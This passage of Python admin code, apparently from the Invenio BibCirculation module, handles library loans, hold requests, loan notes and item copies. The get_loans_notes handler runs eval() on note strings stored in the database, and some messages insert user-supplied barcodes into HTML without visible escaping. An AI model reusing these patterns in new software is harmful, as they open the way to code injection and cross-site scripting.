db.update_loan_request_status(CFG_BIBCIRCULATION_REQUEST_STATUS_CANCELLED,
request_id)
result = db.get_all_requests()
else:
result = db.get_all_requests()
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_all_requests(result=result, ln=ln)
return page(title=_("List of hold requests"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def all_loans(req, msg=None, ln=CFG_SITE_LANG):
"""
Display all loans.
@type loans_per_page: integer.
@param loans_per_page: number of loans per page.
@type jloan: integer.
@param jloan: jump to next loan.
@return: list with all loans (current loans).
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
if msg == 'ok':
infos.append(_('A new loan has been registered with success.'))
result = db.get_all_loans(20)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">' \
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
body = bc_templates.tmpl_all_loans(result=result, infos=infos, ln=ln)
return page(title=_("Current loans"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def all_expired_loans(req, ln=CFG_SITE_LANG):
"""
Display all loans.
@type loans_per_page: integer.
@param loans_per_page: number of loans per page.
@return: list with all expired loans (overdue loans).
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
result = db.get_all_expired_loans()
infos = []
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">' \
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
body = bc_templates.tmpl_all_expired_loans(result=result,
infos=infos,
ln=ln)
return page(title=_('Overdue loans'),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def get_pending_requests(req, request_id, print_data, ln=CFG_SITE_LANG):
"""
Retrun all loan requests that are pending. If request_id is not None,
cancel the request and then, return all loan requests that are pending.
@type request_id: integer.
@param request_id: identify the hold request. It is also the primary key
of the table crcLOANREQUEST.
@type print_data: string.
@param print_data: print requests information.
@return: list of pending requests (on shelf with hold).
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if print_data == 'true':
return print_pending_hold_requests_information(req, ln)
elif request_id:
# Cancel a request too.
db.update_loan_request_status(CFG_BIBCIRCULATION_REQUEST_STATUS_CANCELLED,
request_id)
barcode = db.get_request_barcode(request_id)
update_requests_statuses(barcode)
result = db.get_loan_request_by_status(CFG_BIBCIRCULATION_REQUEST_STATUS_PENDING)
else:
result = db.get_loan_request_by_status(CFG_BIBCIRCULATION_REQUEST_STATUS_PENDING)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_get_pending_requests(result=result, ln=ln)
return page(title=_("Items on shelf with holds"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def get_waiting_requests(req, request_id, print_data, ln=CFG_SITE_LANG):
"""
Get all loans requests that are waiting.
@type request_id: integer.
@param request_id: identify the hold request. It is also the primary key
of the table crcLOANREQUEST.
@type print_data: string.
@param print_data: print requests information.
@return: list of waiting requests (on loan with hold).
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if print_data == 'true':
return print_pending_hold_requests_information(req, ln)
elif request_id:
db.update_loan_request_status(CFG_BIBCIRCULATION_REQUEST_STATUS_CANCELLED,
request_id)
result = db.get_loan_request_by_status(CFG_BIBCIRCULATION_REQUEST_STATUS_WAITING)
aux = ()
for request in result:
if db.get_nb_copies_on_loan(request[1]):
aux += request,
result = aux
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_get_waiting_requests(result=result, ln=ln)
return page(title=_("Items on loan with holds"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def get_expired_loans_with_waiting_requests(req, request_id, ln=CFG_SITE_LANG):
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if request_id:
db.update_loan_request_status(CFG_BIBCIRCULATION_REQUEST_STATUS_CANCELLED,
request_id)
result = db.get_expired_loans_with_waiting_requests()
else:
result = db.get_expired_loans_with_waiting_requests()
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
body = bc_templates.tmpl_get_expired_loans_with_waiting_requests(result=result,
ln=ln)
return page(title=_("Overdue loans with holds"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def get_loans_notes(req, loan_id, delete_key,
library_notes, back, ln=CFG_SITE_LANG):
"""
Get loan's note(s).
@type loan_id: integer.
@param loan_id: identify a loan. It is the primery key of the table
crcLOAN.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if delete_key and loan_id:
if looks_like_dictionary(db.get_loan_notes(loan_id)):
loans_notes = eval(db.get_loan_notes(loan_id))
if delete_key in loans_notes.keys():
del loans_notes[delete_key]
db.update_loan_notes(loan_id, loans_notes)
elif library_notes:
if db.get_loan_notes(loan_id):
if looks_like_dictionary(db.get_loan_notes(loan_id)):
loans_notes = eval(db.get_loan_notes(loan_id))
else:
loans_notes = {}
else:
loans_notes = {}
note_time = time.strftime("%Y-%m-%d %H:%M:%S")
if note_time not in loans_notes.keys():
loans_notes[note_time] = str(library_notes)
db.update_loan_notes(loan_id, loans_notes)
loans_notes = db.get_loan_notes(loan_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">' \
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
referer = req.headers_in.get('referer')
body = bc_templates.tmpl_get_loans_notes(loans_notes=loans_notes,
loan_id=loan_id,
referer=referer, back=back,
ln=ln)
return page(title=_("Loan notes"),
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def get_item_loans_notes(req, loan_id, add_notes, new_note, ln=CFG_SITE_LANG):
"""
Get loan's notes.
@param loan_id: identify a loan. It is the primery key of the table
crcLOAN.
@param recid: identify the record. It is also the primary key of
the table bibrec.
@param borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
@param add_notes: display the textarea where will be written a new notes.
@param new_notes: note that will be added to the others library's notes.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if new_note:
date = '[' + time.ctime() + '] '
new_line = '\n'
new_note = date + new_note + new_line
db.add_new_loan_note(new_note, loan_id)
loans_notes = db.get_loan_notes(loan_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_get_loans_notes(loans_notes=loans_notes,
loan_id=loan_id,
add_notes=add_notes,
ln=ln)
return page(title=_("Loan notes"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
###
### Items and their copies' related .
###
def get_item_details(req, recid, ln=CFG_SITE_LANG):
"""
Display the details of an item.
@type recid: integer.
@param recid: identify the record. It is also the primary key of
the table bibrec.
@return: item details.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
id_user = 1
infos = []
if recid == None:
infos.append(_("Record id not valid"))
copies = db.get_item_copies_details(recid)
requests = db.get_item_requests(recid)
loans = db.get_item_loans(recid)
purchases = db.get_item_purchases(CFG_BIBCIRCULATION_ACQ_STATUS_NEW, recid)
req_hist_overview = db.get_item_requests_historical_overview(recid)
loans_hist_overview = db.get_item_loans_historical_overview(recid)
purchases_hist_overview = db.get_item_purchases(CFG_BIBCIRCULATION_ACQ_STATUS_RECEIVED, recid)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_get_item_details(recid=recid,
copies=copies,
requests=requests,
loans=loans,
purchases=purchases,
req_hist_overview=req_hist_overview,
loans_hist_overview=loans_hist_overview,
purchases_hist_overview=purchases_hist_overview,
infos=infos,
ln=ln)
return page(title=_("Item details"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def get_item_requests_details(req, recid, request_id, ln=CFG_SITE_LANG):
"""
Display all requests for a specific item.
@type recid: integer.
@param recid: identify the record. It is also the primary key of
the table bibrec.
@type request_id: integer.
@param request_id: identify the hold request. It is also the primary key
of the table crcLOANREQUEST.
@return: Item requests details.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if request_id:
db.cancel_request(request_id)
update_request_data(request_id)
result = db.get_item_requests(recid)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_get_item_requests_details(result=result,
ln=ln)
return page(title=_("Hold requests") + \
" - %s" % (book_title_from_MARC(recid)),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def get_item_loans_details(req, recid, barcode, loan_id, force,
ln=CFG_SITE_LANG):
"""
Show all the details about all current loans related with a record.
@type recid: integer.
@param recid: identify the record. It is also the primary key of
the table bibrec.
@type barcode: string.
@param barcode: identify the item. It is the primary key of the table
crcITEM.
@type loan_id: integer.
@param loan_id: identify a loan. It is the primery key of the table
crcLOAN.
@type force: string.
@param force: force the renew of a loan, when usually this is not possible.
@return: item loans details.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
if loan_id and barcode and force == 'true':
new_due_date = renew_loan_for_X_days(barcode)
#db.update_due_date(loan_id, new_due_date)
db.renew_loan(loan_id, new_due_date)
update_status_if_expired(loan_id)
infos.append(_("Loan renewed with success."))
elif barcode:
recid = db.get_id_bibrec(barcode)
item_description = db.get_item_description(barcode)
queue = db.get_queue_request(recid, item_description)
new_due_date = renew_loan_for_X_days(barcode)
force_renew_link = create_html_link(CFG_SITE_SECURE_URL +
'/admin2/bibcirculation/get_item_loans_details',
{'barcode': barcode, 'loan_id': loan_id, 'force': 'true',
'recid': recid, 'ln': ln}, (_("Yes")))
no_renew_link = create_html_link(CFG_SITE_SECURE_URL +
'/admin2/bibcirculation/get_item_loans_details',
{'recid': recid, 'ln': ln},
(_("No")))
if len(queue) != 0:
title = book_title_from_MARC(recid)
message = _("Another user is waiting for this book %(x_strong_tag_open)s%(x_title)s%(x_strong_tag_close)s.") % {'x_title': title, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'}
message += '\n\n'
message += _("Do you want renew this loan anyway?")
message += '\n\n'
message += "[%s] [%s]" % (force_renew_link, no_renew_link)
infos.append(message)
else:
db.renew_loan(loan_id, new_due_date)
#db.update_due_date(loan_id, new_due_date)
update_status_if_expired(loan_id)
infos.append(_("Loan renewed with success."))
result = db.get_item_loans(recid)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_get_item_loans_details(result=result,
recid=recid,
infos=infos,
ln=ln)
return page(title=_("Loans details") + \
" - %s" % (book_title_from_MARC(int(recid))),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def get_item_req_historical_overview(req, recid, ln=CFG_SITE_LANG):
"""
Display the requests historical overview of an item.
@type recid: integer.
@param recid: identify the record. It is also the primary key of
the table bibrec.
@return: Item requests - historical overview.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
req_hist_overview = db.get_item_requests_historical_overview(recid)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_get_item_req_historical_overview(
req_hist_overview=req_hist_overview,
ln=ln)
return page(title=_("Requests") + " - " + _("historical overview"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def get_item_loans_historical_overview(req, recid, ln=CFG_SITE_LANG):
"""
Display the loans historical overview of an item.
@type recid: integer.
@param recid: identify the record. It is also the primary key of
the table bibrec.
@return: Item loans - historical overview.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
loans_hist_overview = db.get_item_loans_historical_overview(recid)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_get_item_loans_historical_overview(
loans_hist_overview=loans_hist_overview,
ln=ln)
return page(title=_("Loans") + " - " + _("historical overview"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def add_new_copy_step1(req, ln=CFG_SITE_LANG):
"""
Add a new copy.
"""
navtrail_previous_links = '<a class="navtrail"' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
body = bc_templates.tmpl_add_new_copy_step1(ln)
return page(title=_("Add new copy") + " - I",
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def add_new_copy_step2(req, p, f, ln=CFG_SITE_LANG):
"""
Add a new copy.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
result = perform_request_search(cc="Books", sc="1", p=p, f=f)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_add_new_copy_step2(result=result, ln=ln)
return page(title=_("Add new copy") + " - II",
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def add_new_copy_step3(req, recid, barcode, ln=CFG_SITE_LANG):
"""
Add a new copy.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
result = db.get_item_copies_details(recid)
libraries = db.get_internal_libraries()
navtrail_previous_links = '<a class="navtrail"' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
if barcode is not None:
if not db.barcode_in_use(barcode):
barcode = None
tmp_barcode = generate_tmp_barcode()
body = bc_templates.tmpl_add_new_copy_step3(recid=recid,
result=result,
libraries=libraries,
original_copy_barcode=barcode,
tmp_barcode=tmp_barcode,
infos=infos,
ln=ln)
return page(title=_("Add new copy") + " - III",
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def add_new_copy_step4(req, barcode, library, location, collection, description,
loan_period, status, expected_arrival_date, recid,
ln=CFG_SITE_LANG):
"""
Add a new copy.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
navtrail_previous_links = '<a class="navtrail"' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
infos = []
result = db.get_item_copies_details(recid)
libraries = db.get_internal_libraries()
if db.barcode_in_use(barcode):
infos.append(_("The given barcode <strong>%(x_name)s</strong> is already in use.", x_name=barcode))
title = _("Add new copy") + " - III"
body = bc_templates.tmpl_add_new_copy_step3(recid=recid,
result=result,
libraries=libraries,
original_copy_barcode=None,
tmp_barcode=None,
infos=infos,
ln=ln)
elif not barcode:
infos.append(_("The given barcode is empty."))
title = _("Add new copy") + " - III"
body = bc_templates.tmpl_add_new_copy_step3(recid=recid,
result=result,
libraries=libraries,
original_copy_barcode=None,
tmp_barcode=None,
infos=infos,
ln=ln)
elif barcode[:3] == 'tmp' \
and status in [CFG_BIBCIRCULATION_ITEM_STATUS_ON_SHELF,
CFG_BIBCIRCULATION_ITEM_STATUS_ON_LOAN,
CFG_BIBCIRCULATION_ITEM_STATUS_IN_PROCESS]:
infos.append(_("The status selected does not accept tamporary barcodes."))
title = _("Add new copy") + " - III"
tmp_barcode = generate_tmp_barcode()
body = bc_templates.tmpl_add_new_copy_step3(recid=recid,
result=result,
libraries=libraries,
original_copy_barcode=None,
tmp_barcode=tmp_barcode,
infos=infos,
ln=ln)
else:
library_name = db.get_library_name(library)
tup_infos = (barcode, library, library_name, location, collection,
description, loan_period, status, expected_arrival_date,
recid)
title = _("Add new copy") + " - IV"
body = bc_templates.tmpl_add_new_copy_step4(tup_infos=tup_infos, ln=ln)
return page(title=title,
uid=id_user,
req=req,
body=body,
metaheaderadd='<link rel="stylesheet" href="%s/vendors/jquery-ui/themes/themes/jquery-ui.min.css" '\
'type="text/css" />' % CFG_SITE_SECURE_URL,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def add_new_copy_step5(req, barcode, library, location, collection, description,
loan_period, status, expected_arrival_date, recid,
ln=CFG_SITE_LANG):
"""
Add a new copy.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
if not db.barcode_in_use(barcode):
db.add_new_copy(barcode, recid, library, collection, location, description.strip() or '-',
loan_period, status, expected_arrival_date)
update_requests_statuses(barcode)
else:
infos.append(_("The given barcode <strong>%(x_name)s</strong> is already in use.", x_name=barcode))
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_add_new_copy_step5(infos=infos, recid=recid, ln=ln)
return page(title=_("Add new copy") + " - V",
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def delete_copy_step1(req, barcode, ln):
#id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
barcode = barcode.strip('\'" \t')
recid = db.get_id_bibrec(barcode)
if recid:
#recid = recid[0]
infos.append(_("Do you really want to delete this copy of the book?"))
copies = db.get_item_copies_details(recid)
title = _("Delete copy")
body = bc_templates.tmpl_delete_copy_step1(barcode_to_delete=barcode,
recid=recid,
result=copies,
infos=infos,
ln=ln)
else:
message = _("""The barcode <strong>%(x_name)s</strong> was not found""", x_name=(barcode))
infos.append(message)
title = _("Item search")
body = bc_templates.tmpl_item_search(infos=infos, ln=ln)
return page(title=title,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def delete_copy_step2(req, barcode, ln):
#id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
barcode = barcode.strip('\'" \t')
recid = db.get_id_bibrec(barcode)
if recid:
#recid = recid[0]
if db.delete_copy(barcode)==1:
message = _("The copy with barcode <strong>%(x_name)s</strong> has been deleted.", x_name=barcode)
else:
message = _('It was NOT possible to delete the copy with barcode <strong>%(x_name)s</strong>', x_name=barcode)
infos.append(message)
copies = db.get_item_copies_details(recid)
requests = db.get_item_requests(recid)
loans = db.get_item_loans(recid)
purchases = db.get_item_purchases(CFG_BIBCIRCULATION_ACQ_STATUS_NEW, recid)
req_hist_overview = db.get_item_requests_historical_overview(recid)
loans_hist_overview = db.get_item_loans_historical_overview(recid)
purchases_hist_overview = db.get_item_purchases(CFG_BIBCIRCULATION_ACQ_STATUS_RECEIVED, recid)
title = _("Item details")
body = bc_templates.tmpl_get_item_details(
recid=recid, copies=copies,
requests=requests, loans=loans,
purchases=purchases,
req_hist_overview=req_hist_overview,
loans_hist_overview=loans_hist_overview,
purchases_hist_overview=purchases_hist_overview,
infos=infos, ln=ln)
else:
message = _("The barcode <strong>%(x_name)s</strong> was not found", x_name=barcode)
infos.append(message)
title = _("Item search")
body = bc_templates.tmpl_item_search(infos=infos, ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
return page(title=title,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_item_info_step1(req, ln=CFG_SITE_LANG):
"""
Update the item's information.
"""
navtrail_previous_links = '<a class="navtrail"' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
body = bc_templates.tmpl_update_item_info_step1(ln=ln)
return page(title=_("Update item information"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_item_info_step2(req, p, f, ln=CFG_SITE_LANG):
"""
Update the item's information.
"""
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
result = perform_request_search(cc="Books", sc="1", p=p, f=f)
body = bc_templates.tmpl_update_item_info_step2(result=result, ln=ln)
return page(title="Update item information",
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_item_info_step3(req, recid, ln=CFG_SITE_LANG):
"""
Update the item's information.
"""
navtrail_previous_links = '<a class="navtrail"' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
result = db.get_item_copies_details(recid)
body = bc_templates.tmpl_update_item_info_step3(recid=recid, result=result,
ln=ln)
return page(title=_("Update item information"),
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_item_info_step4(req, barcode, ln=CFG_SITE_LANG):
"""
Update the item's information.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
recid = db.get_id_bibrec(barcode)
result = db.get_item_info(barcode)
libraries = db.get_internal_libraries()
libraries += db.get_hidden_libraries()
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
if recid == None:
_ = gettext_set_language(ln)
infos = []
infos.append(_("Barcode <strong>%(x_name)s</strong> not found", x_name=barcode))
return item_search(req, infos, ln)
body = bc_templates.tmpl_update_item_info_step4(recid=recid,
result=result,
libraries=libraries,
ln=ln)
return page(title=_("Update item information"),
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_item_info_step5(req, barcode, old_barcode, library, location,
collection, description, loan_period, status,
expected_arrival_date, recid, ln=CFG_SITE_LANG):
"""
Update the item's information.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
library_name = db.get_library_name(library)
tup_infos = (barcode, old_barcode, library, library_name, location,
collection, description, loan_period, status,
expected_arrival_date, recid)
navtrail_previous_links = '<a class="navtrail"' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_update_item_info_step5(tup_infos=tup_infos, ln=ln)
return page(title=_("Update item information"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_item_info_step6(req, tup_infos, ln=CFG_SITE_LANG):
"""
Update the item's information.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
# tuple containing information for the update process.
(barcode, old_barcode, library_id, location, collection,
description, loan_period, status, expected_arrival_date, recid) = tup_infos
is_on_loan = db.is_on_loan(old_barcode)
#is_requested = db.is_requested(old_barcode)
# if item on loan and new status is CFG_BIBCIRCULATION_ITEM_STATUS_ON_SHELF,
# item has to be returned.
if is_on_loan and status == CFG_BIBCIRCULATION_ITEM_STATUS_ON_SHELF:
db.update_item_status(CFG_BIBCIRCULATION_ITEM_STATUS_ON_SHELF, old_barcode)
db.return_loan(old_barcode)
if not is_on_loan and status == CFG_BIBCIRCULATION_ITEM_STATUS_ON_LOAN:
status = db.get_copy_details(barcode)[7]
infos.append(_("Item <strong>[%(x_name)s]</strong> updated, but the <strong>status was not modified</strong>.",x_name=old_barcode))
# update item information.
db.update_item_info(old_barcode, library_id, collection, location, description.strip(),
loan_period, status, expected_arrival_date)
update_requests_statuses(old_barcode)
navtrail_previous_links = '<a class="navtrail"' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
if barcode != old_barcode:
if db.barcode_in_use(barcode):
infos.append(_("Item <strong>[%(x_name)s]</strong> updated, but the <strong>barcode was not modified</strong> because it is already in use.", x_name=old_barcode))
else:
if db.update_barcode(old_barcode, barcode):
infos.append(_("Item <strong>[%(x_name)s]</strong> updated to <strong>[%(x_new)s]</strong> with success.",
x_name=old_barcode, x_new=barcode))
else:
infos.append(_("Item <strong>[%(x_name)s]</strong> updated, but the <strong>barcode was not modified</strong> because it was not found (!?).", x_name=old_barcode))
copies = db.get_item_copies_details(recid)
requests = db.get_item_requests(recid)
loans = db.get_item_loans(recid)
purchases = db.get_item_purchases(CFG_BIBCIRCULATION_ACQ_STATUS_NEW, recid)
req_hist_overview = db.get_item_requests_historical_overview(recid)
loans_hist_overview = db.get_item_loans_historical_overview(recid)
purchases_hist_overview = db.get_item_purchases(CFG_BIBCIRCULATION_ACQ_STATUS_RECEIVED, recid)
body = bc_templates.tmpl_get_item_details(recid=recid,
copies=copies,
requests=requests,
loans=loans,
purchases=purchases,
req_hist_overview=req_hist_overview,
loans_hist_overview=loans_hist_overview,
purchases_hist_overview=purchases_hist_overview,
infos=infos,
ln=ln)
return page(title=_("Update item information"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
else:
return redirect_to_url(req, CFG_SITE_SECURE_URL +
"/record/edit/#state=edit&recid=" + str(recid))
def item_search(req, infos=[], ln=CFG_SITE_LANG):
"""
Display a form where is possible to searh for an item.
"""
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">' \
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
_ = gettext_set_language(ln)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
body = bc_templates.tmpl_item_search(infos=infos, ln=ln)
return page(title=_("Item search"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def item_search_result(req, p, f, ln=CFG_SITE_LANG):
"""
Search an item and return a list with all the possible results. To retrieve
the information desired, we use the method 'perform_request_search' (from
search_engine.py). In the case of BibCirculation, we are just looking for
books (items) inside the collection 'Books'.
@type p: string
@param p: search pattern
@type f: string
@param f: search field
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
if p == '':
